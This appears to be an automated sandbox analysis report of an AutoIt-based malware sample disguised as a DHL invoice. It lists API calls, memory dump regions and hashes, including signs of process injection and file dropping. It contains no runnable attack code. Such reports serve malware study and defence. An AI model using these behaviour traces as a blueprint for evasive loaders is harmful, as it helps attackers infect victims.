                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Window$CreateShow
                                                                                                                        • String ID: AutoIt v3$edit
                                                                                                                        • API String ID: 1584632944-3779509399
                                                                                                                        • Opcode ID: d158b2af07d2df6de11881d0006795f118ce40641e90d1b6cb83bbe7a35dd3ea
                                                                                                                        • Instruction ID: 98bcb48bdc13650635e317bffa35d1517632f5e214ff3869e6e43d4b0c7a6342
                                                                                                                        • Opcode Fuzzy Hash: d158b2af07d2df6de11881d0006795f118ce40641e90d1b6cb83bbe7a35dd3ea
                                                                                                                        • Instruction Fuzzy Hash: 95F0B7755503907AEB211717AD08E772EBDD7C6F50F00106EFD04E25B0C6711851DAB8

                                                                                                                        Control-flow Graph

                                                                                                                        [Control-flow graph 1339: entry block eaf0b8-eaf1db; API calls in graph: CreateFileW, VirtualAlloc, ReadFile, ExitProcess]
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00EAEFA8: Sleep.KERNELBASE(000001F4), ref: 00EAEFB9
                                                                                                                        • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 00EAF1D1
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2053537403.0000000000EAC000.00000040.00000020.00020000.00000000.sdmp, Offset: 00EAC000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_eac000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CreateFileSleep
                                                                                                                        • String ID: L4XDR7AIUKBLR75J1E7EAJT
                                                                                                                        • API String ID: 2694422964-2933334646
                                                                                                                        • Opcode ID: 9cb2d06581380c8efa20985d7e5230c3ead38b072c95495f1f5ccaea879e903e
                                                                                                                        • Instruction ID: 1bf7fa1ccec96cbc548f632ad27d3b4ff505b7a2f5bf73efee7b1caaae98b3c8
                                                                                                                        • Opcode Fuzzy Hash: 9cb2d06581380c8efa20985d7e5230c3ead38b072c95495f1f5ccaea879e903e
                                                                                                                        • Instruction Fuzzy Hash: D851A170D04288DAEF11DBE4C858BEEBBB8AF19304F144199E2087B2C1D7B91B49CB65

                                                                                                                        Control-flow Graph

                                                                                                                        [Control-flow graph 1363: entry block 3a2947-3a29b9; API calls in graph: DeleteFileW (x4), CopyFileW]
                                                                                                                        APIs
                                                                                                                        • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 003A2C05
                                                                                                                        • DeleteFileW.KERNEL32(?), ref: 003A2C87
                                                                                                                        • CopyFileW.KERNEL32(?,?,00000000,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 003A2C9D
                                                                                                                        • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 003A2CAE
                                                                                                                        • DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 003A2CC0
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: File$Delete$Copy
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3226157194-0
                                                                                                                        • Opcode ID: ecb984c9f5c541f62b977f274bcff9d8c0281da36e7f37f55a8731bffa391f79
                                                                                                                        • Instruction ID: b1919587a9f808bc2fbe95d643fb35e7b4fba6b6a37b1427cd801eec91444d05
                                                                                                                        • Opcode Fuzzy Hash: ecb984c9f5c541f62b977f274bcff9d8c0281da36e7f37f55a8731bffa391f79
                                                                                                                        • Instruction Fuzzy Hash: 09B15E72D00119ABDF26DBA8CC85EDFB7BDEF09350F1044A6F909EA151EB319A448F61

                                                                                                                        Control-flow Graph

                                                                                                                        [Control-flow graph 1469: entry block 365aa9-365ace; API calls in graph: WriteFile, GetLastError]
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: JO3
                                                                                                                        • API String ID: 0-1249764312
                                                                                                                        • Opcode ID: cc9c00e0e069c1c60bb2f46ce627244756a19732b255588aa89a3eda4b5a8649
                                                                                                                        • Instruction ID: f8b41dd9f43bdb2f1638203aa30f6a3a69c52a4e0b4efb2be4dea4c2ac513531
                                                                                                                        • Opcode Fuzzy Hash: cc9c00e0e069c1c60bb2f46ce627244756a19732b255588aa89a3eda4b5a8649
                                                                                                                        • Instruction Fuzzy Hash: EB51B075D0060AAFCF239FA8C945FAEBFB8EF05310F158069F805AB2A5D7719901DB61
                                                                                                                        APIs
                                                                                                                        • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,?,?,80000001,80000001,?,00333B0F,SwapMouseButtons,00000004,?), ref: 00333B40
                                                                                                                        • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,80000001,80000001,?,00333B0F,SwapMouseButtons,00000004,?), ref: 00333B61
                                                                                                                        • RegCloseKey.KERNELBASE(00000000,?,?,?,80000001,80000001,?,00333B0F,SwapMouseButtons,00000004,?), ref: 00333B83
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CloseOpenQueryValue
                                                                                                                        • String ID: Control Panel\Mouse
                                                                                                                        • API String ID: 3677997916-824357125
                                                                                                                        • Opcode ID: 8ed34c774835aafb1aff53b4d04c69dc4a7834f1019c271e98a17a7e72f670c5
                                                                                                                        • Instruction ID: 8fb63fa251f6ac1061b473c789ead33196ce2d03a474bbc1b6c138ac7689122d
                                                                                                                        • Opcode Fuzzy Hash: 8ed34c774835aafb1aff53b4d04c69dc4a7834f1019c271e98a17a7e72f670c5
                                                                                                                        • Instruction Fuzzy Hash: 4B112AB5520218FFDB228FA5DC84EAEB7BCEF04744F118459F805D7110D231EE409760
APIs
• CreateProcessW.KERNELBASE(?,00000000), ref: 00EAE7D5
• Wow64GetThreadContext.KERNEL32(?,00010007), ref: 00EAE7F9
• ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 00EAE81B
Memory Dump Source
• Source File: 00000000.00000002.2053537403.0000000000EAC000.00000040.00000020.00020000.00000000.sdmp, Offset: 00EAC000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_eac000_DHL DOC INV 191224.jbxd
Similarity
• API ID: Process$ContextCreateMemoryReadThreadWow64
• String ID:
• API String ID: 2438371351-0
APIs
• LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 003733A2
  • Part of subcall function 00336B57: _wcslen.LIBCMT ref: 00336B6A
• Shell_NotifyIconW.SHELL32(00000001,?), ref: 00333A04
Memory Dump Source
• Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
• Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
Similarity
• API ID: IconLoadNotifyShell_String_wcslen
• String ID: Line:
• API String ID: 2289894680-1585850449
APIs
• GetOpenFileNameW.COMDLG32(?), ref: 00372C8C
  • Part of subcall function 00333AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00333A97,?,?,00332E7F,?,?,?,00000000), ref: 00333AC2
  • Part of subcall function 00332DA5: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00332DC4
Memory Dump Source
• Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
• Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
Similarity
• API ID: Name$Path$FileFullLongOpen
• String ID: X$`e?
• API String ID: 779396738-120205953
APIs
• __CxxThrowException@8.LIBVCRUNTIME ref: 00350668
  • Part of subcall function 003532A4: RaiseException.KERNEL32(?,?,?,0035068A,?,00401444,?,?,?,?,?,?,0035068A,00331129,003F8738,00331129), ref: 00353304
• __CxxThrowException@8.LIBVCRUNTIME ref: 00350685
Memory Dump Source
• Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
• Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
Similarity
• API ID: Exception@8Throw$ExceptionRaise
• String ID: Unknown exception
• API String ID: 3476068407-410509341
APIs
• GetTempPathW.KERNEL32(00000104,?,00000001), ref: 003A302F
• GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 003A3044
Memory Dump Source
• Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
• Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
Similarity
• API ID: Temp$FileNamePath
• String ID: aut
• API String ID: 3285503233-3010740371
APIs
• GetCurrentProcess.KERNEL32(00000000,00000067,000000FF,?,?,?), ref: 003B82F5
• TerminateProcess.KERNEL32(00000000), ref: 003B82FC
• FreeLibrary.KERNEL32(?,?,?,?), ref: 003B84DD
Memory Dump Source
• Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
• Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
Similarity
• API ID: Process$CurrentFreeLibraryTerminate
• String ID:
• API String ID: 146820519-0
APIs
  • Part of subcall function 00333923: Shell_NotifyIconW.SHELL32(00000001,?), ref: 00333A04
• Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 0039C259
• KillTimer.USER32(?,00000001,?,?), ref: 0039C261
• SetTimer.USER32(?,00000001,000002EE,00000000), ref: 0039C270
Memory Dump Source
• Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
• Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
Similarity
• API ID: IconNotifyShell_Timer$Kill
• String ID:
• API String ID: 3500052701-0
APIs
• CloseHandle.KERNELBASE(00000000,00000000,?,?,003685CC,?,003F8CC8,0000000C), ref: 00368704
• GetLastError.KERNEL32(?,003685CC,?,003F8CC8,0000000C), ref: 0036870E
• __dosmaperr.LIBCMT ref: 00368739
Memory Dump Source
• Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
• Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
Similarity
• API ID: CloseErrorHandleLast__dosmaperr
• String ID:
• API String ID: 2583163307-0
APIs
• TranslateMessage.USER32(?), ref: 0033DB7B
• DispatchMessageW.USER32(?), ref: 0033DB89
• PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0033DB9F
• Sleep.KERNEL32(0000000A), ref: 0033DBB1
• TranslateAcceleratorW.USER32(?,?,?), ref: 00381CC9
Memory Dump Source
• Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
• Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
Similarity
• API ID: Message$Translate$AcceleratorDispatchPeekSleep
• String ID:
• API String ID: 3288985973-0
APIs
• CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,00000000,?,?,003A2CD4,?,?,?,00000004,00000001), ref: 003A2FF2
• SetFileTime.KERNELBASE(00000000,?,00000000,?,?,003A2CD4,?,?,?,00000004,00000001,?,?,00000004,00000001), ref: 003A3006
• CloseHandle.KERNEL32(00000000,?,003A2CD4,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 003A300D
Memory Dump Source
• Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
Similarity
• API ID: File$CloseCreateHandleTime
• String ID:
• API String ID: 3397143404-0
APIs
• __Init_thread_footer.LIBCMT ref: 003417F6
Strings
Memory Dump Source
• Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
Similarity
• API ID: Init_thread_footer
• String ID: CALL
• API String ID: 1385522511-4196123274
APIs
• _wcslen.LIBCMT ref: 003A6F6B
  • Part of subcall function 00334ECB: LoadLibraryExW.KERNEL32(?,00000000,00000002,?,00401418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00334EFD
Strings
Memory Dump Source
• Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
Similarity
• API ID: LibraryLoad_wcslen
• String ID: >>>AUTOIT SCRIPT<<<
• API String ID: 3312870042-2806939583
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
Similarity
• API ID: __fread_nolock
• String ID: EA06
• API String ID: 2638373210-3962188686
APIs
• Shell_NotifyIconW.SHELL32(00000000,?), ref: 00333908
Memory Dump Source
• Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
Similarity
• API ID: IconNotifyShell_
• String ID:
• API String ID: 1144537725-0
APIs
• CreateProcessW.KERNELBASE(?,00000000), ref: 00EAE7D5
• Wow64GetThreadContext.KERNEL32(?,00010007), ref: 00EAE7F9
• ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 00EAE81B
Memory Dump Source
• Source File: 00000000.00000002.2053537403.0000000000EAC000.00000040.00000020.00020000.00000000.sdmp, Offset: 00EAC000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_eac000_DHL DOC INV 191224.jbxd
Similarity
• API ID: Process$ContextCreateMemoryReadThreadWow64
• String ID:
• API String ID: 2438371351-0
APIs
Memory Dump Source
• Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
Similarity
• API ID: ProtectVirtual
• String ID:
• API String ID: 544645111-0
APIs
  • Part of subcall function 00334E90: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00334EDD,?,00401418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00334E9C
  • Part of subcall function 00334E90: GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00334EAE
  • Part of subcall function 00334E90: FreeLibrary.KERNEL32(00000000,?,?,00334EDD,?,00401418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00334EC0
• LoadLibraryExW.KERNEL32(?,00000000,00000002,?,00401418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00334EFD
  • Part of subcall function 00334E59: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00373CDE,?,00401418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00334E62
  • Part of subcall function 00334E59: GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00334E74
  • Part of subcall function 00334E59: FreeLibrary.KERNEL32(00000000,?,?,00373CDE,?,00401418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00334E87
Memory Dump Source
• Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
Similarity
• API ID: Library$Load$AddressFreeProc
• String ID:
• API String ID: 2632591731-0
                                                                                                                        • Opcode ID: de45ad6af31cff585563085285b18c95f600ff095d531270b91b88ba71834ca8
                                                                                                                        • Instruction ID: 0635c3e311656b1488d22117a5f7a59262ce1c8608b7c0a4e73c05c02d53b189
                                                                                                                        • Opcode Fuzzy Hash: de45ad6af31cff585563085285b18c95f600ff095d531270b91b88ba71834ca8
                                                                                                                        • Instruction Fuzzy Hash: 5E112332610205AACF27AB64DC82FAD77A9AF40B11F14842DF442AE1C1EE74EE059B50
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: __wsopen_s
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3347428461-0
                                                                                                                        • Opcode ID: d9b70949f49baccbceb95f83bd8e835c0453960d5decb2a1f572dbd9580bdd68
                                                                                                                        • Instruction ID: e03b1860b14c75a4dd8915eefb821daf6a789162ff952bc16afb23bb39350094
                                                                                                                        • Opcode Fuzzy Hash: d9b70949f49baccbceb95f83bd8e835c0453960d5decb2a1f572dbd9580bdd68
                                                                                                                        • Instruction Fuzzy Hash: B8115E7190410AAFCF06DF58E94099E7BF4EF48300F118159FC08AB311DB30DA11CB64
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00364C7D: RtlAllocateHeap.NTDLL(00000008,00331129,00000000,?,00362E29,00000001,00000364,?,?,?,0035F2DE,00363863,00401444,?,0034FDF5,?), ref: 00364CBE
                                                                                                                        • _free.LIBCMT ref: 0036506C
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AllocateHeap_free
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 614378929-0
                                                                                                                        • Opcode ID: 9ba45ce058d1080761d5af908226540236078fd1fc19e2e0238d0ad147f07c6e
                                                                                                                        • Instruction ID: 0db2f4090693b0787ded5eb7a6b2c2d634521ed33134f84736b05a5367fc33ed
                                                                                                                        • Opcode Fuzzy Hash: 9ba45ce058d1080761d5af908226540236078fd1fc19e2e0238d0ad147f07c6e
                                                                                                                        • Instruction Fuzzy Hash: 930149726047056BE3328F65D885A9AFBECFB89370F26452DF184872C0EB30A805C7B4
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: d6c69ec2a70ac845cc05b5f137181c3f07394ab8b33ef369e8c7ef627d5c9574
                                                                                                                        • Instruction ID: b30988700cf2b9736134b6dfb1a057069fffd976fc13dbb9fb189879be87ecf1
                                                                                                                        • Opcode Fuzzy Hash: d6c69ec2a70ac845cc05b5f137181c3f07394ab8b33ef369e8c7ef627d5c9574
                                                                                                                        • Instruction Fuzzy Hash: 43F0F432510A10AAC7373A69DC05F5B339D9F523B3F114B15FC219A1E2CB74D90A86E5
                                                                                                                        APIs
                                                                                                                        • RtlAllocateHeap.NTDLL(00000008,00331129,00000000,?,00362E29,00000001,00000364,?,?,?,0035F2DE,00363863,00401444,?,0034FDF5,?), ref: 00364CBE
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AllocateHeap
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1279760036-0
                                                                                                                        • Opcode ID: a88cfc0f677be518a73bd828da07ee03120c6642d1bd61346d32d494c03a6313
                                                                                                                        • Instruction ID: 0bacec0b9821714b25b82f874425631add3d9bd6992bc2604906cf18900b6b46
                                                                                                                        • Opcode Fuzzy Hash: a88cfc0f677be518a73bd828da07ee03120c6642d1bd61346d32d494c03a6313
                                                                                                                        • Instruction Fuzzy Hash: D1F0E931E0222477DB235F669C09F5A379CBF81BA1B16C121FC19EA798CA70D80187E0
                                                                                                                        APIs
